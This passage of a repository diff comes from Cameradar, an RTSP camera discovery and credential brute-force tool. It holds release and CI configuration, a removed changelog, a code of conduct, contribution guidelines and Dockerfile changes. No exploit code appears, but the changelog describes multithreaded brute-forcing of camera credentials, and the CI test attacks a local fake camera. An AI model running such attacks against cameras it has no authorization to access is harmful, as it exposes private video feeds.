- CGO_ENABLED=0
|
||||
goos:
|
||||
- windows
|
||||
- darwin
|
||||
- linux
|
||||
goarch:
|
||||
- amd64
|
||||
- 386
|
||||
- arm
|
||||
- arm64
|
||||
goarm:
|
||||
- 6
|
||||
- 7
|
||||
|
||||
ignore:
|
||||
- goos: darwin
|
||||
goarch: 386
|
||||
|
||||
changelog:
|
||||
disable: true
|
||||
|
||||
checksum:
|
||||
name_template: "{{ .ProjectName }}_checksums.txt"
|
||||
|
||||
archives:
|
||||
- name_template: "{{ .Binary }}_{{ .Os }}_{{ .Arch }}{{ if .Arm}}v{{ .Arm }}{{ end }}"
|
||||
formats:
|
||||
- tar.gz
|
||||
format_overrides:
|
||||
- goos: windows
|
||||
format: zip
|
||||
|
||||
dockers:
|
||||
- image_templates:
|
||||
- "ullaakut/{{ .ProjectName }}:v{{ .Version }}-amd64"
|
||||
- "ullaakut/{{ .ProjectName }}:latest-amd64"
|
||||
dockerfile: Dockerfile
|
||||
use: buildx
|
||||
goos: linux
|
||||
goarch: amd64
|
||||
- image_templates:
|
||||
- "ullaakut/{{ .ProjectName }}:v{{ .Version }}-386"
|
||||
- "ullaakut/{{ .ProjectName }}:latest-386"
|
||||
dockerfile: Dockerfile
|
||||
use: buildx
|
||||
goos: linux
|
||||
goarch: 386
|
||||
- image_templates:
|
||||
- "ullaakut/{{ .ProjectName }}:v{{ .Version }}-armv6"
|
||||
- "ullaakut/{{ .ProjectName }}:latest-armv6"
|
||||
dockerfile: Dockerfile
|
||||
use: buildx
|
||||
goos: linux
|
||||
goarch: arm
|
||||
goarm: 6
|
||||
- image_templates:
|
||||
- "ullaakut/{{ .ProjectName }}:v{{ .Version }}-armv7"
|
||||
- "ullaakut/{{ .ProjectName }}:latest-armv7"
|
||||
dockerfile: Dockerfile
|
||||
use: buildx
|
||||
goos: linux
|
||||
goarch: arm
|
||||
goarm: 7
|
||||
- image_templates:
|
||||
- "ullaakut/{{ .ProjectName }}:v{{ .Version }}-arm64"
|
||||
- "ullaakut/{{ .ProjectName }}:latest-arm64"
|
||||
dockerfile: Dockerfile
|
||||
use: buildx
|
||||
goos: linux
|
||||
goarch: arm64
|
||||
|
||||
docker_manifests:
|
||||
- name_template: "ullaakut/{{ .ProjectName }}:v{{ .Version }}"
|
||||
image_templates:
|
||||
- "ullaakut/{{ .ProjectName }}:v{{ .Version }}-amd64"
|
||||
- "ullaakut/{{ .ProjectName }}:v{{ .Version }}-386"
|
||||
- "ullaakut/{{ .ProjectName }}:v{{ .Version }}-armv6"
|
||||
- "ullaakut/{{ .ProjectName }}:v{{ .Version }}-armv7"
|
||||
- "ullaakut/{{ .ProjectName }}:v{{ .Version }}-arm64"
|
||||
- name_template: "ullaakut/{{ .ProjectName }}:latest"
|
||||
image_templates:
|
||||
- "ullaakut/{{ .ProjectName }}:latest-amd64"
|
||||
- "ullaakut/{{ .ProjectName }}:latest-386"
|
||||
- "ullaakut/{{ .ProjectName }}:latest-armv6"
|
||||
- "ullaakut/{{ .ProjectName }}:latest-armv7"
|
||||
- "ullaakut/{{ .ProjectName }}:latest-arm64"
|
||||
-55
@@ -1,55 +0,0 @@
|
||||
dist: trusty
|
||||
sudo: required
|
||||
language: go
|
||||
|
||||
env:
|
||||
- DEP_VERSION="0.5.0"
|
||||
|
||||
services:
|
||||
- docker
|
||||
|
||||
before_install:
|
||||
- echo "Testing Docker Hub credentials"
|
||||
- if [[ "$DOCKER_PASSOWRD" != "" ]]; then docker login -u=$DOCKER_USERNAME -p=$DOCKER_PASSWORD; fi
|
||||
- echo "Docker Hub credentials are working"
|
||||
# If I see one day that Travis CI updates their default docker version
|
||||
# I can remove the lines below. That's why I leave this here :-)
|
||||
- docker version
|
||||
- sudo apt-get remove docker docker-engine docker.io
|
||||
- curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
|
||||
- sudo apt-get update
|
||||
- sudo apt-get install -y docker-ce nmap
|
||||
- go get github.com/mattn/goveralls
|
||||
- docker version
|
||||
- curl -L -s https://github.com/golang/dep/releases/download/v${DEP_VERSION}/dep-linux-amd64 -o $GOPATH/bin/dep
|
||||
- chmod +x $GOPATH/bin/dep
|
||||
|
||||
install:
|
||||
- dep ensure
|
||||
- docker build -t cameradar .
|
||||
|
||||
script:
|
||||
# Run unit tests
|
||||
- go test -v -covermode=count -coverprofile=coverage.out
|
||||
- $HOME/gopath/bin/goveralls -coverprofile=coverage.out -service=travis-ci -repotoken=$COVERALLS_TOKEN
|
||||
# Launch a fake camera to check if cameradar is able to access it
|
||||
- docker run -d --name=fake_camera -e RTSP_USERNAME=admin -e RTSP_PASSWORD=12345 -p 8554:8554 ullaakut/rtspatt
|
||||
# Launch cameradar on the local machine
|
||||
- docker run --net=host -t cameradar -t 0.0.0.0 -l > logs.txt
|
||||
- docker logs fake_camera > camera_logs.txt
|
||||
# Stop the fake camera
|
||||
- docker stop fake_camera
|
||||
# Print logs
|
||||
- cat camera_logs.txt
|
||||
- cat logs.txt
|
||||
# check if file contains more than one line
|
||||
# 1 line: Error message because no streams were found
|
||||
# More lines: Logs for all found cameras
|
||||
- if [[ $(wc -l <logs.txt) -lt 2 ]]; then exit 1; fi
|
||||
|
||||
notifications:
|
||||
email:
|
||||
recipients:
|
||||
- brendan.le-glaunec@epitech.eu
|
||||
on_success: never
|
||||
on_failure: always
|
||||
-222
@@ -1,222 +0,0 @@
|
||||
# Cameradar Changelog
|
||||
|
||||
This file lists all versions of the repository and precises all changes.
|
||||
|
||||
## v2.0.0
|
||||
|
||||
#### Major changes:
|
||||
|
||||
* Cameradar is no longer a C++ application but a Golang library
|
||||
* It is also a Golang application replacing the former C++ one (the C++ Cameradar image can still be used with the tag `1.1.4`)
|
||||
* The new docker image is twice lighter (14MB vs 379MB before)
|
||||
* The Cameradar golang library enables users to build their own application around camera discovery and attack. Example of applications could be an automatic camera discovery daemon with scheduled scans, a security audit tool to check if CCTV cameras are protected from attacks by being isolated and having strong passwords, etc.
|
||||
|
||||
## v1.1.4
|
||||
|
||||
#### Minor changes:
|
||||
|
||||
* Simplified use of Docker image
|
||||
* Renamed MySQL table name to be more explicit
|
||||
* Refactoring of the Golang functional tester done
|
||||
* The output was made more human readable
|
||||
* Added automatic code quality checks for pull requests
|
||||
* Added contribution documentation
|
||||
* Updated dictionaries to add user suggestions for Chinese cameras
|
||||
* Enhanced `result.json` file's format
|
||||
|
||||
#### Bugfixes:
|
||||
|
||||
* Fixed a bug in the functional testing in which if the `result.json` file was not formatted correctly, the test failed but was still considered a success.
|
||||
|
||||
## v1.1.3
|
||||
|
||||
#### Minor changes:
|
||||
|
||||
* Added automatic pushes to DockerHub to the travis integration
|
||||
* Made travis configuration file better
|
||||
* Changed the package generation scripts to make them report errors
|
||||
* Removed old etix_rtsp_server binary from the test folder
|
||||
|
||||
#### Bugfixes:
|
||||
|
||||
* Fixed an issue that made it mandatory to launch tests at least once so that they can work the second time
|
||||
* Fixed an issue that made the golang testing tool not compile in the testing script
|
||||
* Fixed an issue that made the golang testing tool sometimes ignore some tests
|
||||
* The previous known issue has been investigated and we don't know where it came from. However after a night of testing I have been unable to reproduce it, so I will consider it closed
|
||||
|
||||
## v1.1.2
|
||||
|
||||
#### Minor changes:
|
||||
|
||||
* Added travis integration
|
||||
* Added default environment value for Docker deployment
|
||||
* Updated docker image description with new easy usage
|
||||
* Updated README badges style (replaced flat with square-flat)
|
||||
* Build last package can now also generate a debug package if given the `Debug` command-line argument
|
||||
|
||||
#### Known issues
|
||||
|
||||
* There is still the issue with Camera Emulation Server, see the [previous version's patchnote](#v1.1.1) for more information.
|
||||
|
||||
## v1.1.1
|
||||
|
||||
#### Minor changes:
|
||||
|
||||
* Removed unnecessary null pointer checks (thanks to https://github.com/elfring)
|
||||
* Updated package description
|
||||
* Removed debug message in CMake build
|
||||
* Added `/ch01.264` to the URL dictionary in the deployment (Comelit default RTSP URL)
|
||||
* Updated tests partially (still needs work to make the code cleaner)
|
||||
* Variable names are now compliant with Golang best practices
|
||||
* JSON variable names are back to normal
|
||||
* Functions have been moved in more appropriate source files
|
||||
* Structure definitions have been moved in more appropriate source files
|
||||
* Source files have been renamed to be more relevant
|
||||
* JUnit output now considers each camera as a test case
|
||||
* JUnit output now contains errors which makes debugging much easier
|
||||
* Added header files where it was forgotten
|
||||
|
||||
#### Bugfixes:
|
||||
|
||||
* Fixed an issue where if you loose your internet connection during thumbnail generation, FFMpeg would get stuck forever and thus Cameradar would never finish
|
||||
* Fixed an issue where multithreading could cause crashes
|
||||
* Fixed an issue where the routes dictionary was mistaken for the credentials dictionary
|
||||
* Fixed issues with the golang testing tool
|
||||
* Fixed automated camera generation
|
||||
* Fixed docker IP address resolution
|
||||
|
||||
#### Known issues:
|
||||
|
||||
* There is an issue with Camera Emulation Server that makes it impossible for Cameradar to generate thumbnails, which is why right now the verification of the thumbnails presence is commented and it is assumed correct. It is probably an issue with GST-RTSP-Server but requires investigation.
|
||||
|
||||
## v1.1.0
|
||||
|
||||
#### Major changes:
|
||||
|
||||
* There are more command line options
|
||||
* Port can now be overridden in the command line
|
||||
* Target can now be overridden in the command line
|
||||
* Bruteforce is now multithreaded and will use as many threads as there are discovered cameras
|
||||
* Thumbnail generation is now multithreaded and will use as many threads as there are discovered cameras
|
||||
* There are now default configuration values in order to make cameradar easier to use
|
||||
|
||||
#### Minor changes:
|
||||
|
||||
* The algorithms take external input into account (so that a 3rd party can change the DB to help Cameradar in real-time) and thus check the persistent data at each iteration
|
||||
* The default log level is now DEBUG instead of INFO
|
||||
* The attack logs are now INFO instead of DEBUG
|
||||
* The thumbnail generation logs are now INFO instead of DEBUG
|
||||
|
||||
#### Bugs fixed
|
||||
|
||||
* Fixed a bug in which the MySQL cache manager would consider a camera with known ids as having a valid path even if it weren't
|
||||
* Fixed a bug in which TCP RTSP streams would not generate thumbnails
|
||||
|
||||
## v1.0.5
|
||||
|
||||
* Fixed error in MySQL Cache Manager in which thumbnail generation on valid streams could not be done
|
||||
* Fixed potential crash in the case the machine running cameradar has no memory left to allocate space for the dynamic cache manager
|
||||
|
||||
## v1.0.4
|
||||
|
||||
#### Bugs fixed:
|
||||
|
||||
* Fixed nmap package detection
|
||||
|
||||
## v1.0.3
|
||||
|
||||
#### Bugs fixed:
|
||||
|
||||
* Corrected GStreamer check
|
||||
|
||||
## v1.0.2
|
||||
|
||||
#### Bugs fixed:
|
||||
|
||||
* Fixed issues in MySQL Cache Manager
|
||||
|
||||
#### Minor changes:
|
||||
|
||||
* Added useful debug logs
|
||||
|
||||
## v1.0.1
|
||||
|
||||
### Ubuntu 16.04 Release
|
||||
|
||||
#### Major changes:
|
||||
|
||||
* The Docker deployment is now done using Ubuntu 16.04 instead of Ubuntu 15.10, so that it uses more recent packages.
|
||||
|
||||
#### Minor changes:
|
||||
|
||||
* Removed useless dependencies
|
||||
|
||||
## v1.0.0
|
||||
|
||||
### First production-ready release
|
||||
|
||||
#### Major changes:
|
||||
|
||||
* Added functional testing
|
||||
|
||||
## v0.2.2
|
||||
|
||||
After doing some testing on a weirdly configured camera network in a far away Datacenter, I discovered that some Cameras needed a few tweaks to the Cameradar attack method in order to be accessed.
|
||||
|
||||
#### Major changes:
|
||||
|
||||
* Cameradar can access Cameras that are configured to always send 400 Bad Requests responses
|
||||
|
||||
#### Minor changes:
|
||||
|
||||
* Changed iterator name from `it` to `stream` in dumb cache manager to improve code readability
|
||||
|
||||
#### Bugfixes:
|
||||
|
||||
* Cameradar no longer considers a timing out Camera as an accessible stream
|
||||
|
||||
## v0.2.1
|
||||
|
||||
This package adds fixes the Docker deployment package.
|
||||
|
||||
#### Minor changes
|
||||
|
||||
* Fixed the Docker deployment package
|
||||
* Updated README
|
||||
|
||||
## v0.2.0
|
||||
|
||||
### MySQL Cache Manager Release
|
||||
|
||||
This package adds a new cache manager using a MySQL database, that can store the results between mutiple uses.
|
||||
|
||||
#### Major changes
|
||||
|
||||
* Added a MySQL Cache Manager
|
||||
|
||||
#### Minor changes
|
||||
|
||||
* Removed legacy code
|
||||
* Removed boost dependency
|
||||
* Improved debugging logs
|
||||
|
||||
## v0.1.1
|
||||
|
||||
### Docker release
|
||||
|
||||
This package adds a way to deploy Cameradar using Docker.
|
||||
|
||||
#### Major changes
|
||||
|
||||
* Added a quick Docker deployment process
|
||||
* Added automatic dependencies downloading through CMake for the manual installation
|
||||
* Added CPack packaging for the Docker deployment
|
||||
|
||||
#### Minor changes
|
||||
|
||||
* Changed recommended cloning method to HTTPS
|
||||
* Added lots of informations to README.md
|
||||
|
||||
## v0.1.0
|
||||
|
||||
This package was the first OpenSource version of Cameradar. It contained only a simple cache manager and had some bugs.
|
||||
@@ -0,0 +1,128 @@
|
||||
# Contributor Covenant Code of Conduct
|
||||
|
||||
## Our Pledge
|
||||
|
||||
We as members, contributors, and leaders pledge to make participation in our
|
||||
community a harassment-free experience for everyone, regardless of age, body
|
||||
size, visible or invisible disability, ethnicity, sex characteristics, gender
|
||||
identity and expression, level of experience, education, socio-economic status,
|
||||
nationality, personal appearance, race, religion, or sexual identity
|
||||
and orientation.
|
||||
|
||||
We pledge to act and interact in ways that contribute to an open, welcoming,
|
||||
diverse, inclusive, and healthy community.
|
||||
|
||||
## Our Standards
|
||||
|
||||
Examples of behavior that contributes to a positive environment for our
|
||||
community include:
|
||||
|
||||
* Demonstrating empathy and kindness toward other people
|
||||
* Being respectful of differing opinions, viewpoints, and experiences
|
||||
* Giving and gracefully accepting constructive feedback
|
||||
* Accepting responsibility and apologizing to those affected by our mistakes,
|
||||
and learning from the experience
|
||||
* Focusing on what is best not just for us as individuals, but for the
|
||||
overall community
|
||||
|
||||
Examples of unacceptable behavior include:
|
||||
|
||||
* The use of sexualized language or imagery, and sexual attention or
|
||||
advances of any kind
|
||||
* Trolling, insulting or derogatory comments, and personal or political attacks
|
||||
* Public or private harassment
|
||||
* Publishing others' private information, such as a physical or email
|
||||
address, without their explicit permission
|
||||
* Other conduct which could reasonably be considered inappropriate in a
|
||||
professional setting
|
||||
|
||||
## Enforcement Responsibilities
|
||||
|
||||
Community leaders are responsible for clarifying and enforcing our standards of
|
||||
acceptable behavior and will take appropriate and fair corrective action in
|
||||
response to any behavior that they deem inappropriate, threatening, offensive,
|
||||
or harmful.
|
||||
|
||||
Community leaders have the right and responsibility to remove, edit, or reject
|
||||
comments, commits, code, wiki edits, issues, and other contributions that are
|
||||
not aligned to this Code of Conduct, and will communicate reasons for moderation
|
||||
decisions when appropriate.
|
||||
|
||||
## Scope
|
||||
|
||||
This Code of Conduct applies within all community spaces, and also applies when
|
||||
an individual is officially representing the community in public spaces.
|
||||
Examples of representing our community include using an official e-mail address,
|
||||
posting via an official social media account, or acting as an appointed
|
||||
representative at an online or offline event.
|
||||
|
||||
## Enforcement
|
||||
|
||||
Instances of abusive, harassing, or otherwise unacceptable behavior may be
|
||||
reported to the community leaders responsible for enforcement at
|
||||
`contact+cameradar@glaulabs.com`.
|
||||
All complaints will be reviewed and investigated promptly and fairly.
|
||||
|
||||
All community leaders are obligated to respect the privacy and security of the
|
||||
reporter of any incident.
|
||||
|
||||
## Enforcement Guidelines
|
||||
|
||||
Community leaders will follow these Community Impact Guidelines in determining
|
||||
the consequences for any action they deem in violation of this Code of Conduct:
|
||||
|
||||
### 1. Correction
|
||||
|
||||
**Community Impact**: Use of inappropriate language or other behavior deemed
|
||||
unprofessional or unwelcome in the community.
|
||||
|
||||
**Consequence**: A private, written warning from community leaders, providing
|
||||
clarity around the nature of the violation and an explanation of why the
|
||||
behavior was inappropriate. A public apology may be requested.
|
||||
|
||||
### 2. Warning
|
||||
|
||||
**Community Impact**: A violation through a single incident or series
|
||||
of actions.
|
||||
|
||||
**Consequence**: A warning with consequences for continued behavior. No
|
||||
interaction with the people involved, including unsolicited interaction with
|
||||
those enforcing the Code of Conduct, for a specified period of time. This
|
||||
includes avoiding interactions in community spaces as well as external channels
|
||||
like social media. Violating these terms may lead to a temporary or
|
||||
permanent ban.
|
||||
|
||||
### 3. Temporary Ban
|
||||
|
||||
**Community Impact**: A serious violation of community standards, including
|
||||
sustained inappropriate behavior.
|
||||
|
||||
**Consequence**: A temporary ban from any sort of interaction or public
|
||||
communication with the community for a specified period of time. No public or
|
||||
private interaction with the people involved, including unsolicited interaction
|
||||
with those enforcing the Code of Conduct, is allowed during this period.
|
||||
Violating these terms may lead to a permanent ban.
|
||||
|
||||
### 4. Permanent Ban
|
||||
|
||||
**Community Impact**: Demonstrating a pattern of violation of community
|
||||
standards, including sustained inappropriate behavior, harassment of an
|
||||
individual, or aggression toward or disparagement of classes of individuals.
|
||||
|
||||
**Consequence**: A permanent ban from any sort of public interaction within
|
||||
the community.
|
||||
|
||||
## Attribution
|
||||
|
||||
This Code of Conduct is adapted from the [Contributor Covenant][homepage],
|
||||
version 2.0, available at
|
||||
https://www.contributor-covenant.org/version/2/0/code_of_conduct.html.
|
||||
|
||||
Community Impact Guidelines were inspired by [Mozilla's code of conduct
|
||||
enforcement ladder](https://github.com/mozilla/diversity).
|
||||
|
||||
[homepage]: https://www.contributor-covenant.org
|
||||
|
||||
For answers to common questions about this code of conduct, see the FAQ at
|
||||
https://www.contributor-covenant.org/faq. Translations are available at
|
||||
https://www.contributor-covenant.org/translations.
|
||||
+31
-68
@@ -1,82 +1,45 @@
|
||||
# Cameradar Contribution
|
||||
## Contributing
|
||||
|
||||
This file will give you guidelines on how to contribute if you want to, and will list known contributors to this repo.
|
||||
Thanks for helping improve Cameradar.
|
||||
Please keep changes focused and aligned with the project goals.
|
||||
|
||||
If you're not into software development or not into Golang, you can still help. Updating the dictionaries for example, would be a really cool contribution! Just make sure the credentials and routes you add are **default constructor credentials** and not custom credentials.
|
||||
## Development setup
|
||||
|
||||
If you have other cool ideas, feel free to share them with me at [brendan.leglaunec@etixgroup.com](mailto:brendan.leglaunec@etixgroup.com) or to directly [create an issue](https://github.com/Ullaakut/cameradar/issues)!
|
||||
- Go 1.25 or later
|
||||
- Docker (optional, for container testing)
|
||||
|
||||
## Version 2.0.0
|
||||
Clone the repo and install dependencies using Go modules.
|
||||
|
||||
*Cameradar* is the name of the Golang library and the binary that serves as an example of its use, as well as the docker image that runs the binary.
|
||||
```bash
|
||||
go mod download
|
||||
```
|
||||
|
||||
The 2.0.0 version was a complete refactorring of the Cameradar C++ tool, which came from the fact that most users who want to access cameras either wanted to launch it with the basic cache manager, mostly using the docker image already provided in this repository, or did not use it because it did not integrate into their software solution easily.
|
||||
## Run tests
|
||||
|
||||
Transforming it into a library allowed developers to use it directly in their own code exactly as they want, allowing for a greater flexibility. The Cameradar binary also provides a simple use example as well as maintains the old simple way of using Cameradar for non-developers.
|
||||
```bash
|
||||
make test
|
||||
```
|
||||
|
||||
## Workflow
|
||||
## Formatting and linting
|
||||
|
||||
### Branches & issues
|
||||
Run `gofmt` on changed files.
|
||||
Keep code idiomatic and consistent with existing style.
|
||||
|
||||
If you want to work on an issue, make sure you create a specific branch for this issue using the format `issue_number-solution_explanation`. Examples are:
|
||||
```bash
|
||||
make fmt
|
||||
```
|
||||
|
||||
If issue `#64` is `Improve network scan performance`, the branch to fix it should be something like: `64-improve-network-scan-performance`. Note that it should always start with a verb conjugated in the infinitive form, and describe what the commits's effects will be on the codebase. One branch should only be for one change. If your branch fixes multiple things, you're doing it wrong.
|
||||
## Reporting issues
|
||||
|
||||
Always make sure you're not working on the same issue as someone else, by asking on the issue thread to be assigned to it.
|
||||
Use the issue template in [.github/ISSUE_TEMPLATE.md](.github/ISSUE_TEMPLATE.md).
|
||||
Include the version, environment, and repro steps.
|
||||
Only scan authorized targets.
|
||||
|
||||
### Commit names
|
||||
## Pull requests
|
||||
|
||||
The name of the commits should always be #[issue number] [effect of the issue] (ex: `#343 Improve test coverage`).
|
||||
|
||||
When working on your local branch, you can do as many commits as you want, obviously. The most important is that you squash your commits before creating your pull request, or at least before it is merged.
|
||||
|
||||
In case you're not familiar with squashing, here is a simple way to do it :
|
||||
|
||||
- `git fetch origin` will make sure that you have a local version of the origin repository that is up to date (will not overwrite anything on your branch, no worries)
|
||||
- `git rebase -i origin/master` will start the process of rebasing your branch
|
||||
- This will open a file letting you decide what to do with the commits. You want to keep the first `pick` and write `s` or `squash` instead of `pick` for all other commits below.
|
||||
- If there are conflicts, you will fix them step by step by following what git tells you, it's pretty straight-forward.
|
||||
- If there are no conflicts or if they are resolved, git will let you edit the commit names. Don't forget to comment the commit names of the commits you squashed if they are not relevant by adding a # character in front of the commit message, and make sure that the commit message you left follows the aforementioned guidelines.
|
||||
- Now run `git log`, you should see only one commit by the name you chose during the rebase.
|
||||
- You can now `git push -f` if you already pused your branch on origin or simply push without the `-f` if it's your first push on origin. The reason for the `-f` is that when you squash your commits, you create a new one that will conflict with the state of your branch on origin. If you pull, it will overwrite your local state, so don't do that except if you messed up your rebase.
|
||||
|
||||
### Pull Requests
|
||||
|
||||
When your pull request is created, GitHub will first check for conflicts, Codacy will check the shell and C++ code's quality and then Travis CI will try to build and launch functional tests of your versions of Cameradar.
|
||||
|
||||
If GitHub reports conflicts with the develop branch, you should resolve them by yourself using your git command-line interface. The easiest and cleanest way is to use `git rebase -i origin/develop` and follow git's instructions.
|
||||
If Codacy reports new issues, they will be added in the comments of the PR to let you know what you should fix.
|
||||
If Travis CI reports errors, you should be able to view the logs [by clicking here](https://travis-ci.org/Ullaakut/cameradar/builds) and you should fix it. No PR will be merged before all tests are passing correctly.
|
||||
|
||||
When creating your pull request, our hooks will make sure that your code:
|
||||
|
||||
- Builds
|
||||
- Has 100% passing unit tests
|
||||
- Can actually access a camera using a functional test
|
||||
- Still has equivalent or higher test coverage (using coveralls)
|
||||
|
||||
Make sure to write in the PR description what issue it fixes. GitHub will intepret it and automatically close the issue once your pull request is closed. Just write Fixes #IssueNumber in the description.
|
||||
|
||||
When your pull request is created, GitHub will first check for conflicts and then your code will be reviewed by the maintainers of this repository.
|
||||
|
||||
If GitHub reports conflicts with the `master` branch, you should resolve them by yourself using your git command-line interface. The easiest and cleanest way is to use `git rebase -i origin/master` and follow git's instructions. If we report issues with your code, you should resolve them and then ping the person that reported them to notify them that you did the requested changes.
|
||||
|
||||
Once everything is in order, we will merge your pull request.
|
||||
|
||||
### Coding guidelines
|
||||
|
||||
Your code should just
|
||||
|
||||
- Not decrease the results of Cameradar on https://goreportcard.com/report/github.com/Ullaakut/cameradar
|
||||
- Pass the code review
|
||||
|
||||
#### Golang
|
||||
|
||||
- All Golang code has to be formated using `gofmt` or `goreturns`.
|
||||
- Make sure you follow the Golang [best practices](https://golang.org/doc/effective_go.html)
|
||||
|
||||
## Contributors
|
||||
|
||||
- **Brendan Le Glaunec** - [@Ullaakut](https://github.com/Ullaakut) - brendan.leglaunec@etixgroup.com : *Original developer & Maintainer*
|
||||
- **Jeremy Letang** - [@jeremyletang](https://github.com/jeremyletang) - letang.jeremy@gmail.com : *Idea of the project & Mentorship*
|
||||
- **ishanjain28** - [@ishanjain28](https://github.com/ishanjain28) - ishanjain28@gmail.com : *Implemented the environment variables support*
|
||||
1. Create a feature branch from `master`.
|
||||
2. Keep PRs focused and small.
|
||||
3. Update documentation when behavior changes.
|
||||
4. Add or update tests when possible.
|
||||
5. Ensure `make test` passes.
|
||||
6. Try to bring as much test coverage as possible with your changes.
|
||||
|
||||
+10
-25
@@ -1,32 +1,17 @@
|
||||
# Build stage
|
||||
FROM golang:alpine AS build-env
|
||||
|
||||
COPY . /go/src/github.com/Ullaakut/cameradar
|
||||
WORKDIR /go/src/github.com/Ullaakut/cameradar/cameradar
|
||||
|
||||
RUN apk update && \
|
||||
apk upgrade && \
|
||||
apk add nmap nmap-nselibs nmap-scripts \
|
||||
curl curl-dev \
|
||||
gcc \
|
||||
libc-dev \
|
||||
git \
|
||||
pkgconfig
|
||||
ENV DEP_VERSION="0.5.0"
|
||||
RUN curl -L -s https://github.com/golang/dep/releases/download/v${DEP_VERSION}/dep-linux-amd64 -o $GOPATH/bin/dep
|
||||
RUN chmod +x $GOPATH/bin/dep
|
||||
RUN dep ensure
|
||||
RUN go build -o cameradar
|
||||
|
||||
# Final stage
|
||||
FROM alpine
|
||||
|
||||
RUN apk --update add --no-cache nmap \
|
||||
nmap-nselibs \
|
||||
nmap-scripts \
|
||||
curl-dev
|
||||
masscan \
|
||||
libpcap \
|
||||
libpcap-dev
|
||||
|
||||
WORKDIR /app/cameradar
|
||||
COPY --from=build-env /go/src/github.com/Ullaakut/cameradar/dictionaries/ /app/dictionaries/
|
||||
COPY --from=build-env /go/src/github.com/Ullaakut/cameradar/cameradar/ /app/cameradar/
|
||||
ENTRYPOINT ["/app/cameradar/cameradar", "-r", "/app/dictionaries/routes", "-c", "/app/dictionaries/credentials.json"]
|
||||
|
||||
COPY cameradar /app/cameradar/cameradar
|
||||
|
||||
ENV CAMERADAR_CUSTOM_ROUTES="/app/dictionaries/routes"
|
||||
ENV CAMERADAR_CUSTOM_CREDENTIALS="/app/dictionaries/credentials.json"
|
||||
|
||||
ENTRYPOINT ["/app/cameradar/cameradar"]
|
||||
|
||||
Generated
-300
@@ -1,300 +0,0 @@
|
||||
# This file is autogenerated, do not edit; changes may be undone by the next 'dep ensure'.
|
||||
|
||||
[[projects]]
|
||||
branch = "master"
|
||||
digest = "1:50b257fde8ffe647a6fdb6a7fb1314711232b7ecfb891f5cd5c140c046ab89cd"
|
||||
name = "github.com/Ullaakut/nmap"
|
||||
packages = [
|
||||
".",
|
||||
"pkg/osfamilies",
|
||||
]
|
||||
pruneopts = "UT"
|
||||
revision = "6d3f7b465d7b37c8e019c95bc1c9f6c4f93e4ee7"
|
||||
|
||||
[[projects]]
|
||||
branch = "master"
|
||||
digest = "1:e339fa18a6e1d4dd04282f5ba77b8a09cbbf1067ba20915de87d1e65367a9c9f"
|
||||
name = "github.com/andelf/go-curl"
|
||||
packages = ["."]
|
||||
pruneopts = "UT"
|
||||
revision = "9d81ad32de98e80df412c890c75d8964f696a910"
|
||||
|
||||
[[projects]]
|
||||
digest = "1:ffe9824d294da03b391f44e1ae8281281b4afc1bdaa9588c9097785e3af10cec"
|
||||
name = "github.com/davecgh/go-spew"
|
||||
packages = ["spew"]
|
||||
pruneopts = "UT"
|
||||
revision = "8991bc29aa16c548c550c7ff78260e27b9ab7c73"
|
||||
version = "v1.1.1"
|
||||
|
||||
[[projects]]
|
||||
digest = "1:865079840386857c809b72ce300be7580cb50d3d3129ce11bf9aa6ca2bc1934a"
|
||||
name = "github.com/fatih/color"
|
||||
packages = ["."]
|
||||
pruneopts = "UT"
|
||||
revision = "5b77d2a35fb0ede96d138fc9a99f5c9b6aef11b4"
|
||||
version = "v1.7.0"
|
||||
|
||||
[[projects]]
|
||||
digest = "1:abeb38ade3f32a92943e5be54f55ed6d6e3b6602761d74b4aab4c9dd45c18abd"
|
||||
name = "github.com/fsnotify/fsnotify"
|
||||
packages = ["."]
|
||||
pruneopts = "UT"
|
||||
revision = "c2828203cd70a50dcccfb2761f8b1f8ceef9a8e9"
|
||||
version = "v1.4.7"
|
||||
|
||||
[[projects]]
|
||||
branch = "master"
|
||||
digest = "1:842de8d5a4c8fdbbceb55ab398dd8b68a35fe7f322012cf70571baa35c333ffa"
|
||||
name = "github.com/gernest/wow"
|
||||
packages = [
|
||||
".",
|
||||
"spin",
|
||||
]
|
||||
pruneopts = "UT"
|
||||
revision = "7e0b2a2398989a5d220eebac5742d45422ba7de8"
|
||||
|
||||
[[projects]]
|
||||
digest = "1:e1ff887e232b2d8f4f7c7db15a5fac7be418025afc4dda53c59c765dbb5aa6b4"
|
||||
name = "github.com/go-playground/locales"
|
||||
packages = [
|
||||
".",
|
||||
"currency",
|
||||
]
|
||||
pruneopts = "UT"
|
||||
revision = "f63010822830b6fe52288ee52d5a1151088ce039"
|
||||
version = "v0.12.1"
|
||||
|
||||
[[projects]]
|
||||
digest = "1:e022cf244bcac1b6ef933f1a2e0adcf6a6dfd7b872d8d41e4d4179bb09a87cbc"
|
||||
name = "github.com/go-playground/universal-translator"
|
||||
packages = ["."]
|
||||
pruneopts = "UT"
|
||||
revision = "b32fa301c9fe55953584134cb6853a13c87ec0a1"
|
||||
version = "v0.16.0"
|
||||
|
||||
[[projects]]
|
||||
digest = "1:c0d19ab64b32ce9fe5cf4ddceba78d5bc9807f0016db6b1183599da3dcc24d10"
|
||||
name = "github.com/hashicorp/hcl"
|
||||
packages = [
|
||||
".",
|
||||
"hcl/ast",
|
||||
"hcl/parser",
|
||||
"hcl/printer",
|
||||
"hcl/scanner",
|
||||
"hcl/strconv",
|
||||
"hcl/token",
|
||||
"json/parser",
|
||||
"json/scanner",
|
||||
"json/token",
|
||||
]
|
||||
pruneopts = "UT"
|
||||
revision = "8cb6e5b959231cc1119e43259c4a608f9c51a241"
|
||||
version = "v1.0.0"
|
||||
|
||||
[[projects]]
|
||||
digest = "1:6782ffc812e8e700e6952ede1e60487ff1fd9da489eff762985be662a7cfc431"
|
||||
name = "github.com/leodido/go-urn"
|
||||
packages = ["."]
|
||||
pruneopts = "UT"
|
||||
revision = "70078a794e8ea4b497ba7c19a78cd60f90ccf0f4"
|
||||
version = "v1.1.0"
|
||||
|
||||
[[projects]]
|
||||
digest = "1:2d0b44ee6208d256e29f55764db1fa41e3ae33fac6cef138acae6a79c3bd748e"
|
||||
name = "github.com/magefile/mage"
|
||||
packages = [
|
||||
"mg",
|
||||
"sh",
|
||||
]
|
||||
pruneopts = "UT"
|
||||
revision = "aedfce64c122eef47009b7f80c9771044753215d"
|
||||
version = "v1.8.0"
|
||||
|
||||
[[projects]]
|
||||
digest = "1:c568d7727aa262c32bdf8a3f7db83614f7af0ed661474b24588de635c20024c7"
|
||||
name = "github.com/magiconair/properties"
|
||||
packages = ["."]
